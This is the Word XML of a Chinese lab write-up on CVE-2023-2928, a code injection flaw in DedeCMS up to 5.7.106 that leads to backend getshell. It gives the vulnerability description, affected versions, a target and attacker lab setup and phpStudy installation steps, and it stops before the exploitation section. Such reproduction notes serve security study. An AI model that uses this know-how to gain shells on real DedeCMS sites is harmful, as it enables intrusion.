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F487" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4488AD88" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A760B54" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7668AF76" w14:textId="052A913B" w:rsidR="00DA5227" w:rsidRDefault="002D0B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0B2A">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CVE-2023-2928</w:t>
      </w:r>
      <w:r w:rsidR="00DA5227" w:rsidRPr="00DA5227">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68282FF2" w14:textId="77777777" w:rsidR="002D0B2A" w:rsidRDefault="002D0B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0B2A">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DedeCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C358DE9" w14:textId="77777777" w:rsidR="002D0B2A" w:rsidRDefault="002D0B2A" w:rsidP="002D0B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0B2A">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件包含漏洞导致后台</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0B2A">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:color w:val="222226"/>
          <w:kern w:val="44"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B1AD61B" w14:textId="1B656738" w:rsidR="0078712B" w:rsidRDefault="006C2EA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="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:id w:val="147465128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Cs w:val="44"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="0F9492DE" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EA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1D305F2" w14:textId="1ACC750C" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc27475" w:history="1">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞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4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E77A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797F0B4" w14:textId="2C47948A" w:rsidR="0078712B" w:rsidRDefault="004B19B5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25949" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>影响版本</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc25949 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009E77A9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AF9F06D" w14:textId="3883B374" w:rsidR="0078712B" w:rsidRDefault="004B19B5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5232" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>环境部署</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc5232 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009E77A9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31894091" w14:textId="02224913" w:rsidR="0078712B" w:rsidRDefault="004B19B5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11219" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc11219 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009E77A9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="797ED2A3" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1163C0DC" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA8553" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B"/>
    <w:p w14:paraId="52098CFB" w14:textId="3F0D8041" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc27475"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3B646C9E" w14:textId="77777777" w:rsidR="002D0B2A" w:rsidRPr="002D0B2A" w:rsidRDefault="002D0B2A" w:rsidP="002D0B2A">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc25949"/>
      <w:proofErr w:type="spellStart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Desdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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DedeCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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（织梦内容管理系统）是中国卓</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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卓</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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网络（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Desdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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）公司的一套基于PHP的开源内容管理系统（CMS）。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DB4F7" w14:textId="3BAC5BD6" w:rsidR="00C14A5F" w:rsidRPr="004C1793" w:rsidRDefault="002D0B2A" w:rsidP="002D0B2A">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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DedeCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 5.7.106之前版本存在代码注入漏洞，该漏洞源于文件uploads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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dede</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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article_allowurl_edit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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存在问题，对参数</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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allurls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D0B2A">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>的操作会导致代码注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52041AA6" w14:textId="5E4BE573" w:rsidR="0078712B" w:rsidRDefault="006C2EAA" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="20AE5C46" w14:textId="22C03F84" w:rsidR="002D0B2A" w:rsidRPr="002D0B2A" w:rsidRDefault="002D0B2A" w:rsidP="002D0B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0B2A">
        <w:t>DedeCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D0B2A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0B2A">
        <w:t>5.7.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F2E2C" w14:textId="52057EB4" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc5232"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="641AF59F" w14:textId="683EFC9F" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial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靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>机：</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D0B2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>server 2008 r2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>172.16.7.</w:t>
      </w:r>
      <w:r w:rsidR="00E33B3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DB1F9" w14:textId="59268912" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>渗透机：</w:t>
      </w:r>
      <w:r w:rsidR="00705A99">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00E33B3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00131DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>172.16.7.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5E847" w14:textId="7421BBD6" w:rsidR="00705A99" w:rsidRDefault="00705A9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4D2FF3C2" w14:textId="0D7D5459" w:rsidR="0025100D" w:rsidRDefault="0025100D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下载含有漏洞的软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42664295" w14:textId="2703747E" w:rsidR="006E30B6" w:rsidRDefault="002D0B2A">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0043617E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.106-UTF8.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A879F32" w14:textId="61912FB9" w:rsidR="002D0B2A" w:rsidRDefault="002D0B2A">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载好后解压</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E0BC4D" w14:textId="24EAC1BC" w:rsidR="002D0B2A" w:rsidRPr="002D0B2A" w:rsidRDefault="002D0B2A">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/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5D170C95" wp14:editId="7D70B7E9">
            <wp:extent cx="5274310" cy="1541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8068" w14:textId="1ED2CE2F" w:rsidR="0025100D" w:rsidRDefault="002D0B2A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安装好</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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phpStudy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="183CA257" w14:textId="22F4B029" w:rsidR="002D0B2A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步骤：将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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phpStudy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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复制进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win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2008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的硬盘，并且安装好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vc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>9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环境即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2016DEED" w14:textId="2872EF42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5C51838D" w14:textId="2D7F3770" w:rsidR="003A78D9" w:rsidRDefault="003A78D9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A3A49A0" wp14:editId="74E4497D">
            <wp:extent cx="5274310" cy="2187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96A3" w14:textId="3B03799E" w:rsidR="003A78D9" w:rsidRDefault="003A78D9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/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F5D67A3" wp14:editId="114C4FBB">
            <wp:extent cx="5274310" cy="13633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821F" w14:textId="379B6F8F" w:rsidR="0025100D" w:rsidRDefault="003A78D9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5214D367" wp14:editId="7358B75C">
            <wp:extent cx="5274310" cy="3073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8462" w14:textId="72E3E12B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安装好后启动</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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phpStudy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B421A4B" w14:textId="7DBBEF4C" w:rsidR="003A78D9" w:rsidRDefault="003A78D9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A9853C" wp14:editId="3E69512C">
            <wp:extent cx="3819048" cy="31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2A3A" w14:textId="1401F132" w:rsidR="003A78D9" w:rsidRDefault="003A78D9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/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按照下面步骤逐一点击，进入网站根目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134F3367" w14:textId="298EBB7F" w:rsidR="003A78D9" w:rsidRDefault="003A78D9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20272B3A" wp14:editId="1B21E0DB">
            <wp:extent cx="5274310" cy="38906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B0AE" w14:textId="7DBDD065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将刚刚下载好的软件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uploads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文件夹的全部内容复制进网站根目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F0B60A" w14:textId="2E848782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2D4F5308" w14:textId="57311459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10E68E40" w14:textId="77EBE0A6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2F16315F" w14:textId="0170E71A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635E7EE6" w14:textId="06989571" w:rsidR="003A78D9" w:rsidRDefault="003A78D9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D5764B" wp14:editId="4C52266A">
            <wp:extent cx="5274310" cy="35598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B6DE" w14:textId="6CA2E402" w:rsidR="003A78D9" w:rsidRDefault="003A78D9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2B069EF5" wp14:editId="71ABF354">
            <wp:extent cx="5274310" cy="36131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22BA" w14:textId="0F8A354C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完成后在浏览器访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="0043617E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidRPr="0043617E">
